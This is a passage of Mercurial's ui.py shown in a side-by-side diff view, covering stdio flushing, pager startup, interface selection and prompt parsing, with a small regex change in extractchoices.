1167 errno.EIO,
1167 errno.EIO,
1168 errno.EBADF,
1168 errno.EBADF,
1169 ):
1169 ):
1170 # no way to report the error, so ignore it
1170 # no way to report the error, so ignore it
1171 return
1171 return
1172 raise error.StdioError(err)
1172 raise error.StdioError(err)
1173 finally:
1173 finally:
1174 self._blockedtimes[b'stdio_blocked'] += (
1174 self._blockedtimes[b'stdio_blocked'] += (
1175 util.timer() - starttime
1175 util.timer() - starttime
1176 ) * 1000
1176 ) * 1000
1177
1177
1178 def _writemsg(self, dest, *args, **opts):
1178 def _writemsg(self, dest, *args, **opts):
1179 _writemsgwith(self._write, dest, *args, **opts)
1179 _writemsgwith(self._write, dest, *args, **opts)
1180
1180
1181 def _writemsgnobuf(self, dest, *args, **opts):
1181 def _writemsgnobuf(self, dest, *args, **opts):
1182 _writemsgwith(self._writenobuf, dest, *args, **opts)
1182 _writemsgwith(self._writenobuf, dest, *args, **opts)
1183
1183
1184 def flush(self):
1184 def flush(self):
1185 # opencode timeblockedsection because this is a critical path
1185 # opencode timeblockedsection because this is a critical path
1186 starttime = util.timer()
1186 starttime = util.timer()
1187 try:
1187 try:
1188 try:
1188 try:
1189 self._fout.flush()
1189 self._fout.flush()
1190 except IOError as err:
1190 except IOError as err:
1191 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1191 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1192 raise error.StdioError(err)
1192 raise error.StdioError(err)
1193 finally:
1193 finally:
1194 try:
1194 try:
1195 self._ferr.flush()
1195 self._ferr.flush()
1196 except IOError as err:
1196 except IOError as err:
1197 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1197 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1198 raise error.StdioError(err)
1198 raise error.StdioError(err)
1199 finally:
1199 finally:
1200 self._blockedtimes[b'stdio_blocked'] += (
1200 self._blockedtimes[b'stdio_blocked'] += (
1201 util.timer() - starttime
1201 util.timer() - starttime
1202 ) * 1000
1202 ) * 1000
1203
1203
1204 def _isatty(self, fh):
1204 def _isatty(self, fh):
1205 if self.configbool(b'ui', b'nontty'):
1205 if self.configbool(b'ui', b'nontty'):
1206 return False
1206 return False
1207 return procutil.isatty(fh)
1207 return procutil.isatty(fh)
1208
1208
1209 def protectfinout(self):
1209 def protectfinout(self):
1210 """Duplicate ui streams and redirect original if they are stdio
1210 """Duplicate ui streams and redirect original if they are stdio
1211
1211
1212 Returns (fin, fout) which point to the original ui fds, but may be
1212 Returns (fin, fout) which point to the original ui fds, but may be
1213 copy of them. The returned streams can be considered "owned" in that
1213 copy of them. The returned streams can be considered "owned" in that
1214 print(), exec(), etc. never reach to them.
1214 print(), exec(), etc. never reach to them.
1215 """
1215 """
1216 if self._finoutredirected:
1216 if self._finoutredirected:
1217 # if already redirected, protectstdio() would just create another
1217 # if already redirected, protectstdio() would just create another
1218 # nullfd pair, which is equivalent to returning self._fin/_fout.
1218 # nullfd pair, which is equivalent to returning self._fin/_fout.
1219 return self._fin, self._fout
1219 return self._fin, self._fout
1220 fin, fout = procutil.protectstdio(self._fin, self._fout)
1220 fin, fout = procutil.protectstdio(self._fin, self._fout)
1221 self._finoutredirected = (fin, fout) != (self._fin, self._fout)
1221 self._finoutredirected = (fin, fout) != (self._fin, self._fout)
1222 return fin, fout
1222 return fin, fout
1223
1223
1224 def restorefinout(self, fin, fout):
1224 def restorefinout(self, fin, fout):
1225 """Restore ui streams from possibly duplicated (fin, fout)"""
1225 """Restore ui streams from possibly duplicated (fin, fout)"""
1226 if (fin, fout) == (self._fin, self._fout):
1226 if (fin, fout) == (self._fin, self._fout):
1227 return
1227 return
1228 procutil.restorestdio(self._fin, self._fout, fin, fout)
1228 procutil.restorestdio(self._fin, self._fout, fin, fout)
1229 # protectfinout() won't create more than one duplicated streams,
1229 # protectfinout() won't create more than one duplicated streams,
1230 # so we can just turn the redirection flag off.
1230 # so we can just turn the redirection flag off.
1231 self._finoutredirected = False
1231 self._finoutredirected = False
1232
1232
1233 @contextlib.contextmanager
1233 @contextlib.contextmanager
1234 def protectedfinout(self):
1234 def protectedfinout(self):
1235 """Run code block with protected standard streams"""
1235 """Run code block with protected standard streams"""
1236 fin, fout = self.protectfinout()
1236 fin, fout = self.protectfinout()
1237 try:
1237 try:
1238 yield fin, fout
1238 yield fin, fout
1239 finally:
1239 finally:
1240 self.restorefinout(fin, fout)
1240 self.restorefinout(fin, fout)
1241
1241
1242 def disablepager(self):
1242 def disablepager(self):
1243 self._disablepager = True
1243 self._disablepager = True
1244
1244
1245 def pager(self, command):
1245 def pager(self, command):
1246 """Start a pager for subsequent command output.
1246 """Start a pager for subsequent command output.
1247
1247
1248 Commands which produce a long stream of output should call
1248 Commands which produce a long stream of output should call
1249 this function to activate the user's preferred pagination
1249 this function to activate the user's preferred pagination
1250 mechanism (which may be no pager). Calling this function
1250 mechanism (which may be no pager). Calling this function
1251 precludes any future use of interactive functionality, such as
1251 precludes any future use of interactive functionality, such as
1252 prompting the user or activating curses.
1252 prompting the user or activating curses.
1253
1253
1254 Args:
1254 Args:
1255 command: The full, non-aliased name of the command. That is, "log"
1255 command: The full, non-aliased name of the command. That is, "log"
1256 not "history, "summary" not "summ", etc.
1256 not "history, "summary" not "summ", etc.
1257 """
1257 """
1258 if self._disablepager or self.pageractive:
1258 if self._disablepager or self.pageractive:
1259 # how pager should do is already determined
1259 # how pager should do is already determined
1260 return
1260 return
1261
1261
1262 if not command.startswith(b'internal-always-') and (
1262 if not command.startswith(b'internal-always-') and (
1263 # explicit --pager=on (= 'internal-always-' prefix) should
1263 # explicit --pager=on (= 'internal-always-' prefix) should
1264 # take precedence over disabling factors below
1264 # take precedence over disabling factors below
1265 command in self.configlist(b'pager', b'ignore')
1265 command in self.configlist(b'pager', b'ignore')
1266 or not self.configbool(b'ui', b'paginate')
1266 or not self.configbool(b'ui', b'paginate')
1267 or not self.configbool(b'pager', b'attend-' + command, True)
1267 or not self.configbool(b'pager', b'attend-' + command, True)
1268 or encoding.environ.get(b'TERM') == b'dumb'
1268 or encoding.environ.get(b'TERM') == b'dumb'
1269 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1269 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1270 # formatted() will need some adjustment.
1270 # formatted() will need some adjustment.
1271 or not self.formatted()
1271 or not self.formatted()
1272 or self.plain()
1272 or self.plain()
1273 or self._buffers
1273 or self._buffers
1274 # TODO: expose debugger-enabled on the UI object
1274 # TODO: expose debugger-enabled on the UI object
1275 or b'--debugger' in pycompat.sysargv
1275 or b'--debugger' in pycompat.sysargv
1276 ):
1276 ):
1277 # We only want to paginate if the ui appears to be
1277 # We only want to paginate if the ui appears to be
1278 # interactive, the user didn't say HGPLAIN or
1278 # interactive, the user didn't say HGPLAIN or
1279 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1279 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1280 return
1280 return
1281
1281
1282 pagercmd = self.config(b'pager', b'pager', rcutil.fallbackpager)
1282 pagercmd = self.config(b'pager', b'pager', rcutil.fallbackpager)
1283 if not pagercmd:
1283 if not pagercmd:
1284 return
1284 return
1285
1285
1286 pagerenv = {}
1286 pagerenv = {}
1287 for name, value in rcutil.defaultpagerenv().items():
1287 for name, value in rcutil.defaultpagerenv().items():
1288 if name not in encoding.environ:
1288 if name not in encoding.environ:
1289 pagerenv[name] = value
1289 pagerenv[name] = value
1290
1290
1291 self.debug(
1291 self.debug(
1292 b'starting pager for command %s\n' % stringutil.pprint(command)
1292 b'starting pager for command %s\n' % stringutil.pprint(command)
1293 )
1293 )
1294 self.flush()
1294 self.flush()
1295
1295
1296 wasformatted = self.formatted()
1296 wasformatted = self.formatted()
1297 if util.safehasattr(signal, b"SIGPIPE"):
1297 if util.safehasattr(signal, b"SIGPIPE"):
1298 signal.signal(signal.SIGPIPE, _catchterm)
1298 signal.signal(signal.SIGPIPE, _catchterm)
1299 if self._runpager(pagercmd, pagerenv):
1299 if self._runpager(pagercmd, pagerenv):
1300 self.pageractive = True
1300 self.pageractive = True
1301 # Preserve the formatted-ness of the UI. This is important
1301 # Preserve the formatted-ness of the UI. This is important
1302 # because we mess with stdout, which might confuse
1302 # because we mess with stdout, which might confuse
1303 # auto-detection of things being formatted.
1303 # auto-detection of things being formatted.
1304 self.setconfig(b'ui', b'formatted', wasformatted, b'pager')
1304 self.setconfig(b'ui', b'formatted', wasformatted, b'pager')
1305 self.setconfig(b'ui', b'interactive', False, b'pager')
1305 self.setconfig(b'ui', b'interactive', False, b'pager')
1306
1306
1307 # If pagermode differs from color.mode, reconfigure color now that
1307 # If pagermode differs from color.mode, reconfigure color now that
1308 # pageractive is set.
1308 # pageractive is set.
1309 cm = self._colormode
1309 cm = self._colormode
1310 if cm != self.config(b'color', b'pagermode', cm):
1310 if cm != self.config(b'color', b'pagermode', cm):
1311 color.setup(self)
1311 color.setup(self)
1312 else:
1312 else:
1313 # If the pager can't be spawned in dispatch when --pager=on is
1313 # If the pager can't be spawned in dispatch when --pager=on is
1314 # given, don't try again when the command runs, to avoid a duplicate
1314 # given, don't try again when the command runs, to avoid a duplicate
1315 # warning about a missing pager command.
1315 # warning about a missing pager command.
1316 self.disablepager()
1316 self.disablepager()
1317
1317
1318 def _runpager(self, command, env=None):
1318 def _runpager(self, command, env=None):
1319 """Actually start the pager and set up file descriptors.
1319 """Actually start the pager and set up file descriptors.
1320
1320
1321 This is separate in part so that extensions (like chg) can
1321 This is separate in part so that extensions (like chg) can
1322 override how a pager is invoked.
1322 override how a pager is invoked.
1323 """
1323 """
1324 if command == b'cat':
1324 if command == b'cat':
1325 # Save ourselves some work.
1325 # Save ourselves some work.
1326 return False
1326 return False
1327 # If the command doesn't contain any of these characters, we
1327 # If the command doesn't contain any of these characters, we
1328 # assume it's a binary and exec it directly. This means for
1328 # assume it's a binary and exec it directly. This means for
1329 # simple pager command configurations, we can degrade
1329 # simple pager command configurations, we can degrade
1330 # gracefully and tell the user about their broken pager.
1330 # gracefully and tell the user about their broken pager.
1331 shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")
1331 shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")
1332
1332
1333 if pycompat.iswindows and not shell:
1333 if pycompat.iswindows and not shell:
1334 # Window's built-in `more` cannot be invoked with shell=False, but
1334 # Window's built-in `more` cannot be invoked with shell=False, but
1335 # its `more.com` can. Hide this implementation detail from the
1335 # its `more.com` can. Hide this implementation detail from the
1336 # user so we can also get sane bad PAGER behavior. MSYS has
1336 # user so we can also get sane bad PAGER behavior. MSYS has
1337 # `more.exe`, so do a cmd.exe style resolution of the executable to
1337 # `more.exe`, so do a cmd.exe style resolution of the executable to
1338 # determine which one to use.
1338 # determine which one to use.
1339 fullcmd = procutil.findexe(command)
1339 fullcmd = procutil.findexe(command)
1340 if not fullcmd:
1340 if not fullcmd:
1341 self.warn(
1341 self.warn(
1342 _(b"missing pager command '%s', skipping pager\n") % command
1342 _(b"missing pager command '%s', skipping pager\n") % command
1343 )
1343 )
1344 return False
1344 return False
1345
1345
1346 command = fullcmd
1346 command = fullcmd
1347
1347
1348 try:
1348 try:
1349 pager = subprocess.Popen(
1349 pager = subprocess.Popen(
1350 procutil.tonativestr(command),
1350 procutil.tonativestr(command),
1351 shell=shell,
1351 shell=shell,
1352 bufsize=-1,
1352 bufsize=-1,
1353 close_fds=procutil.closefds,
1353 close_fds=procutil.closefds,
1354 stdin=subprocess.PIPE,
1354 stdin=subprocess.PIPE,
1355 stdout=procutil.stdout,
1355 stdout=procutil.stdout,
1356 stderr=procutil.stderr,
1356 stderr=procutil.stderr,
1357 env=procutil.tonativeenv(procutil.shellenviron(env)),
1357 env=procutil.tonativeenv(procutil.shellenviron(env)),
1358 )
1358 )
1359 except OSError as e:
1359 except OSError as e:
1360 if e.errno == errno.ENOENT and not shell:
1360 if e.errno == errno.ENOENT and not shell:
1361 self.warn(
1361 self.warn(
1362 _(b"missing pager command '%s', skipping pager\n") % command
1362 _(b"missing pager command '%s', skipping pager\n") % command
1363 )
1363 )
1364 return False
1364 return False
1365 raise
1365 raise
1366
1366
1367 # back up original file descriptors
1367 # back up original file descriptors
1368 stdoutfd = os.dup(procutil.stdout.fileno())
1368 stdoutfd = os.dup(procutil.stdout.fileno())
1369 stderrfd = os.dup(procutil.stderr.fileno())
1369 stderrfd = os.dup(procutil.stderr.fileno())
1370
1370
1371 os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
1371 os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
1372 if self._isatty(procutil.stderr):
1372 if self._isatty(procutil.stderr):
1373 os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())
1373 os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())
1374
1374
1375 @self.atexit
1375 @self.atexit
1376 def killpager():
1376 def killpager():
1377 if util.safehasattr(signal, b"SIGINT"):
1377 if util.safehasattr(signal, b"SIGINT"):
1378 signal.signal(signal.SIGINT, signal.SIG_IGN)
1378 signal.signal(signal.SIGINT, signal.SIG_IGN)
1379 # restore original fds, closing pager.stdin copies in the process
1379 # restore original fds, closing pager.stdin copies in the process
1380 os.dup2(stdoutfd, procutil.stdout.fileno())
1380 os.dup2(stdoutfd, procutil.stdout.fileno())
1381 os.dup2(stderrfd, procutil.stderr.fileno())
1381 os.dup2(stderrfd, procutil.stderr.fileno())
1382 pager.stdin.close()
1382 pager.stdin.close()
1383 pager.wait()
1383 pager.wait()
1384
1384
1385 return True
1385 return True
1386
1386
1387 @property
1387 @property
1388 def _exithandlers(self):
1388 def _exithandlers(self):
1389 return _reqexithandlers
1389 return _reqexithandlers
1390
1390
1391 def atexit(self, func, *args, **kwargs):
1391 def atexit(self, func, *args, **kwargs):
1392 '''register a function to run after dispatching a request
1392 '''register a function to run after dispatching a request
1393
1393
1394 Handlers do not stay registered across request boundaries.'''
1394 Handlers do not stay registered across request boundaries.'''
1395 self._exithandlers.append((func, args, kwargs))
1395 self._exithandlers.append((func, args, kwargs))
1396 return func
1396 return func
1397
1397
1398 def interface(self, feature):
1398 def interface(self, feature):
1399 """what interface to use for interactive console features?
1399 """what interface to use for interactive console features?
1400
1400
1401 The interface is controlled by the value of `ui.interface` but also by
1401 The interface is controlled by the value of `ui.interface` but also by
1402 the value of feature-specific configuration. For example:
1402 the value of feature-specific configuration. For example:
1403
1403
1404 ui.interface.histedit = text
1404 ui.interface.histedit = text
1405 ui.interface.chunkselector = curses
1405 ui.interface.chunkselector = curses
1406
1406
1407 Here the features are "histedit" and "chunkselector".
1407 Here the features are "histedit" and "chunkselector".
1408
1408
1409 The configuration above means that the default interfaces for commands
1409 The configuration above means that the default interfaces for commands
1410 is curses, the interface for histedit is text and the interface for
1410 is curses, the interface for histedit is text and the interface for
1411 selecting chunk is crecord (the best curses interface available).
1411 selecting chunk is crecord (the best curses interface available).
1412
1412
1413 Consider the following example:
1413 Consider the following example:
1414 ui.interface = curses
1414 ui.interface = curses
1415 ui.interface.histedit = text
1415 ui.interface.histedit = text
1416
1416
1417 Then histedit will use the text interface and chunkselector will use
1417 Then histedit will use the text interface and chunkselector will use
1418 the default curses interface (crecord at the moment).
1418 the default curses interface (crecord at the moment).
1419 """
1419 """
1420 alldefaults = frozenset([b"text", b"curses"])
1420 alldefaults = frozenset([b"text", b"curses"])
1421
1421
1422 featureinterfaces = {
1422 featureinterfaces = {
1423 b"chunkselector": [b"text", b"curses",],
1423 b"chunkselector": [b"text", b"curses",],
1424 b"histedit": [b"text", b"curses",],
1424 b"histedit": [b"text", b"curses",],
1425 }
1425 }
1426
1426
1427 # Feature-specific interface
1427 # Feature-specific interface
1428 if feature not in featureinterfaces.keys():
1428 if feature not in featureinterfaces.keys():
1429 # Programming error, not user error
1429 # Programming error, not user error
1430 raise ValueError(b"Unknown feature requested %s" % feature)
1430 raise ValueError(b"Unknown feature requested %s" % feature)
1431
1431
1432 availableinterfaces = frozenset(featureinterfaces[feature])
1432 availableinterfaces = frozenset(featureinterfaces[feature])
1433 if alldefaults > availableinterfaces:
1433 if alldefaults > availableinterfaces:
1434 # Programming error, not user error. We need a use case to
1434 # Programming error, not user error. We need a use case to
1435 # define the right thing to do here.
1435 # define the right thing to do here.
1436 raise ValueError(
1436 raise ValueError(
1437 b"Feature %s does not handle all default interfaces" % feature
1437 b"Feature %s does not handle all default interfaces" % feature
1438 )
1438 )
1439
1439
1440 if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
1440 if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
1441 return b"text"
1441 return b"text"
1442
1442
1443 # Default interface for all the features
1443 # Default interface for all the features
1444 defaultinterface = b"text"
1444 defaultinterface = b"text"
1445 i = self.config(b"ui", b"interface")
1445 i = self.config(b"ui", b"interface")
1446 if i in alldefaults:
1446 if i in alldefaults:
1447 defaultinterface = i
1447 defaultinterface = i
1448
1448
1449 choseninterface = defaultinterface
1449 choseninterface = defaultinterface
1450 f = self.config(b"ui", b"interface.%s" % feature)
1450 f = self.config(b"ui", b"interface.%s" % feature)
1451 if f in availableinterfaces:
1451 if f in availableinterfaces:
1452 choseninterface = f
1452 choseninterface = f
1453
1453
1454 if i is not None and defaultinterface != i:
1454 if i is not None and defaultinterface != i:
1455 if f is not None:
1455 if f is not None:
1456 self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
1456 self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
1457 else:
1457 else:
1458 self.warn(
1458 self.warn(
1459 _(b"invalid value for ui.interface: %s (using %s)\n")
1459 _(b"invalid value for ui.interface: %s (using %s)\n")
1460 % (i, choseninterface)
1460 % (i, choseninterface)
1461 )
1461 )
1462 if f is not None and choseninterface != f:
1462 if f is not None and choseninterface != f:
1463 self.warn(
1463 self.warn(
1464 _(b"invalid value for ui.interface.%s: %s (using %s)\n")
1464 _(b"invalid value for ui.interface.%s: %s (using %s)\n")
1465 % (feature, f, choseninterface)
1465 % (feature, f, choseninterface)
1466 )
1466 )
1467
1467
1468 return choseninterface
1468 return choseninterface
1469
1469
1470 def interactive(self):
1470 def interactive(self):
1471 '''is interactive input allowed?
1471 '''is interactive input allowed?
1472
1472
1473 An interactive session is a session where input can be reasonably read
1473 An interactive session is a session where input can be reasonably read
1474 from `sys.stdin'. If this function returns false, any attempt to read
1474 from `sys.stdin'. If this function returns false, any attempt to read
1475 from stdin should fail with an error, unless a sensible default has been
1475 from stdin should fail with an error, unless a sensible default has been
1476 specified.
1476 specified.
1477
1477
1478 Interactiveness is triggered by the value of the `ui.interactive'
1478 Interactiveness is triggered by the value of the `ui.interactive'
1479 configuration variable or - if it is unset - when `sys.stdin' points
1479 configuration variable or - if it is unset - when `sys.stdin' points
1480 to a terminal device.
1480 to a terminal device.
1481
1481
1482 This function refers to input only; for output, see `ui.formatted()'.
1482 This function refers to input only; for output, see `ui.formatted()'.
1483 '''
1483 '''
1484 i = self.configbool(b"ui", b"interactive")
1484 i = self.configbool(b"ui", b"interactive")
1485 if i is None:
1485 if i is None:
1486 # some environments replace stdin without implementing isatty
1486 # some environments replace stdin without implementing isatty
1487 # usually those are non-interactive
1487 # usually those are non-interactive
1488 return self._isatty(self._fin)
1488 return self._isatty(self._fin)
1489
1489
1490 return i
1490 return i
1491
1491
1492 def termwidth(self):
1492 def termwidth(self):
1493 '''how wide is the terminal in columns?
1493 '''how wide is the terminal in columns?
1494 '''
1494 '''
1495 if b'COLUMNS' in encoding.environ:
1495 if b'COLUMNS' in encoding.environ:
1496 try:
1496 try:
1497 return int(encoding.environ[b'COLUMNS'])
1497 return int(encoding.environ[b'COLUMNS'])
1498 except ValueError:
1498 except ValueError:
1499 pass
1499 pass
1500 return scmutil.termsize(self)[0]
1500 return scmutil.termsize(self)[0]
1501
1501
1502 def formatted(self):
1502 def formatted(self):
1503 '''should formatted output be used?
1503 '''should formatted output be used?
1504
1504
1505 It is often desirable to format the output to suite the output medium.
1505 It is often desirable to format the output to suite the output medium.
1506 Examples of this are truncating long lines or colorizing messages.
1506 Examples of this are truncating long lines or colorizing messages.
1507 However, this is not often not desirable when piping output into other
1507 However, this is not often not desirable when piping output into other
1508 utilities, e.g. `grep'.
1508 utilities, e.g. `grep'.
1509
1509
1510 Formatted output is triggered by the value of the `ui.formatted'
1510 Formatted output is triggered by the value of the `ui.formatted'
1511 configuration variable or - if it is unset - when `sys.stdout' points
1511 configuration variable or - if it is unset - when `sys.stdout' points
1512 to a terminal device. Please note that `ui.formatted' should be
1512 to a terminal device. Please note that `ui.formatted' should be
1513 considered an implementation detail; it is not intended for use outside
1513 considered an implementation detail; it is not intended for use outside
1514 Mercurial or its extensions.
1514 Mercurial or its extensions.
1515
1515
1516 This function refers to output only; for input, see `ui.interactive()'.
1516 This function refers to output only; for input, see `ui.interactive()'.
1517 This function always returns false when in plain mode, see `ui.plain()'.
1517 This function always returns false when in plain mode, see `ui.plain()'.
1518 '''
1518 '''
1519 if self.plain():
1519 if self.plain():
1520 return False
1520 return False
1521
1521
1522 i = self.configbool(b"ui", b"formatted")
1522 i = self.configbool(b"ui", b"formatted")
1523 if i is None:
1523 if i is None:
1524 # some environments replace stdout without implementing isatty
1524 # some environments replace stdout without implementing isatty
1525 # usually those are non-interactive
1525 # usually those are non-interactive
1526 return self._isatty(self._fout)
1526 return self._isatty(self._fout)
1527
1527
1528 return i
1528 return i
1529
1529
1530 def _readline(self, prompt=b' ', promptopts=None):
1530 def _readline(self, prompt=b' ', promptopts=None):
1531 # Replacing stdin/stdout temporarily is a hard problem on Python 3
1531 # Replacing stdin/stdout temporarily is a hard problem on Python 3
1532 # because they have to be text streams with *no buffering*. Instead,
1532 # because they have to be text streams with *no buffering*. Instead,
1533 # we use rawinput() only if call_readline() will be invoked by
1533 # we use rawinput() only if call_readline() will be invoked by
1534 # PyOS_Readline(), so no I/O will be made at Python layer.
1534 # PyOS_Readline(), so no I/O will be made at Python layer.
1535 usereadline = (
1535 usereadline = (
1536 self._isatty(self._fin)
1536 self._isatty(self._fin)
1537 and self._isatty(self._fout)
1537 and self._isatty(self._fout)
1538 and procutil.isstdin(self._fin)
1538 and procutil.isstdin(self._fin)
1539 and procutil.isstdout(self._fout)
1539 and procutil.isstdout(self._fout)
1540 )
1540 )
1541 if usereadline:
1541 if usereadline:
1542 try:
1542 try:
1543 # magically add command line editing support, where
1543 # magically add command line editing support, where
1544 # available
1544 # available
1545 import readline
1545 import readline
1546
1546
1547 # force demandimport to really load the module
1547 # force demandimport to really load the module
1548 readline.read_history_file
1548 readline.read_history_file
1549 # windows sometimes raises something other than ImportError
1549 # windows sometimes raises something other than ImportError
1550 except Exception:
1550 except Exception:
1551 usereadline = False
1551 usereadline = False
1552
1552
1553 if self._colormode == b'win32' or not usereadline:
1553 if self._colormode == b'win32' or not usereadline:
1554 if not promptopts:
1554 if not promptopts:
1555 promptopts = {}
1555 promptopts = {}
1556 self._writemsgnobuf(
1556 self._writemsgnobuf(
1557 self._fmsgout, prompt, type=b'prompt', **promptopts
1557 self._fmsgout, prompt, type=b'prompt', **promptopts
1558 )
1558 )
1559 self.flush()
1559 self.flush()
1560 prompt = b' '
1560 prompt = b' '
1561 else:
1561 else:
1562 prompt = self.label(prompt, b'ui.prompt') + b' '
1562 prompt = self.label(prompt, b'ui.prompt') + b' '
1563
1563
1564 # prompt ' ' must exist; otherwise readline may delete entire line
1564 # prompt ' ' must exist; otherwise readline may delete entire line
1565 # - http://bugs.python.org/issue12833
1565 # - http://bugs.python.org/issue12833
1566 with self.timeblockedsection(b'stdio'):
1566 with self.timeblockedsection(b'stdio'):
1567 if usereadline:
1567 if usereadline:
1568 self.flush()
1568 self.flush()
1569 prompt = encoding.strfromlocal(prompt)
1569 prompt = encoding.strfromlocal(prompt)
1570 line = encoding.strtolocal(pycompat.rawinput(prompt))
1570 line = encoding.strtolocal(pycompat.rawinput(prompt))
1571 # When stdin is in binary mode on Windows, it can cause
1571 # When stdin is in binary mode on Windows, it can cause
1572 # raw_input() to emit an extra trailing carriage return
1572 # raw_input() to emit an extra trailing carriage return
1573 if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
1573 if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
1574 line = line[:-1]
1574 line = line[:-1]
1575 else:
1575 else:
1576 self._fout.write(pycompat.bytestr(prompt))
1576 self._fout.write(pycompat.bytestr(prompt))
1577 self._fout.flush()
1577 self._fout.flush()
1578 line = self._fin.readline()
1578 line = self._fin.readline()
1579 if not line:
1579 if not line:
1580 raise EOFError
1580 raise EOFError
1581 line = line.rstrip(pycompat.oslinesep)
1581 line = line.rstrip(pycompat.oslinesep)
1582
1582
1583 return line
1583 return line
1584
1584
1585 def prompt(self, msg, default=b"y"):
1585 def prompt(self, msg, default=b"y"):
1586 """Prompt user with msg, read response.
1586 """Prompt user with msg, read response.
1587 If ui is not interactive, the default is returned.
1587 If ui is not interactive, the default is returned.
1588 """
1588 """
1589 return self._prompt(msg, default=default)
1589 return self._prompt(msg, default=default)
1590
1590
1591 def _prompt(self, msg, **opts):
1591 def _prompt(self, msg, **opts):
1592 default = opts['default']
1592 default = opts['default']
1593 if not self.interactive():
1593 if not self.interactive():
1594 self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
1594 self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
1595 self._writemsg(
1595 self._writemsg(
1596 self._fmsgout, default or b'', b"\n", type=b'promptecho'
1596 self._fmsgout, default or b'', b"\n", type=b'promptecho'
1597 )
1597 )
1598 return default
1598 return default
1599 try:
1599 try:
1600 r = self._readline(prompt=msg, promptopts=opts)
1600 r = self._readline(prompt=msg, promptopts=opts)
1601 if not r:
1601 if not r:
1602 r = default
1602 r = default
1603 if self.configbool(b'ui', b'promptecho'):
1603 if self.configbool(b'ui', b'promptecho'):
1604 self._writemsg(self._fmsgout, r, b"\n", type=b'promptecho')
1604 self._writemsg(self._fmsgout, r, b"\n", type=b'promptecho')
1605 return r
1605 return r
1606 except EOFError:
1606 except EOFError:
1607 raise error.ResponseExpected()
1607 raise error.ResponseExpected()
1608
1608
1609 @staticmethod
1609 @staticmethod
1610 def extractchoices(prompt):
1610 def extractchoices(prompt):
1611 """Extract prompt message and list of choices from specified prompt.
1611 """Extract prompt message and list of choices from specified prompt.
1612
1612
1613 This returns tuple "(message, choices)", and "choices" is the
1613 This returns tuple "(message, choices)", and "choices" is the
1614 list of tuple "(response character, text without &)".
1614 list of tuple "(response character, text without &)".
1615
1615
1616 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1616 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1617 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1617 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1618 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1618 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1619 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1619 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1620 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1620 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1621 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1621 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1622 """
1622 """
1623
1623
1624 # Sadly, the prompt string may have been built with a filename
1624 # Sadly, the prompt string may have been built with a filename
1625 # containing "$$" so let's try to find the first valid-looking
1625 # containing "$$" so let's try to find the first valid-looking
1626 # prompt to start parsing. Sadly, we also can't rely on
1626 # prompt to start parsing. Sadly, we also can't rely on
1627 # choices containing spaces, ASCII, or basically anything
1627 # choices containing spaces, ASCII, or basically anything
1628 # except an ampersand followed by a character.
1628 # except an ampersand followed by a character.
1629 m = re.match(br'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
1629 m = re.match(br'(?s)(.+?)\$\$([^$]*&[^ $].*)', prompt)
1630 msg = m.group(1)
1630 msg = m.group(1)
1631 choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]
1631 choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]
1632
1632
1633 def choicetuple(s):
1633 def choicetuple(s):
1634 ampidx = s.index(b'&')
1634 ampidx = s.index(b'&')
1635 return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)
1635 return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)
1636
1636
1637 return (msg, [choicetuple(s) for s in choices])
1637 return (msg, [choicetuple(s) for s in choices])
1638
1638
1639 def promptchoice(self, prompt, default=0):
1639 def promptchoice(self, prompt, default=0):
1640 """Prompt user with a message, read response, and ensure it matches
1640 """Prompt user with a message, read response, and ensure it matches
1641 one of the provided choices. The prompt is formatted as follows:
1641 one of the provided choices. The prompt is formatted as follows:
1642
1642
1643 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1643 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1644
1644
1645 The index of the choice is returned. Responses are case
1645 The index of the choice is returned. Responses are case
1646 insensitive. If ui is not interactive, the default is
1646 insensitive. If ui is not interactive, the default is
1647 returned.
1647 returned.
1648 """
1648 """
1649
1649
1650 msg, choices = self.extractchoices(prompt)
1650 msg, choices = self.extractchoices(prompt)
1651 resps = [r for r, t in choices]
1651 resps = [r for r, t in choices]
1652 while True:
1652 while True:
1653 r = self._prompt(msg, default=resps[default], choices=choices)
1653 r = self._prompt(msg, default=resps[default], choices=choices)
1654 if r.lower() in resps:
1654 if r.lower() in resps:
1655 return resps.index(r.lower())
1655 return resps.index(r.lower())
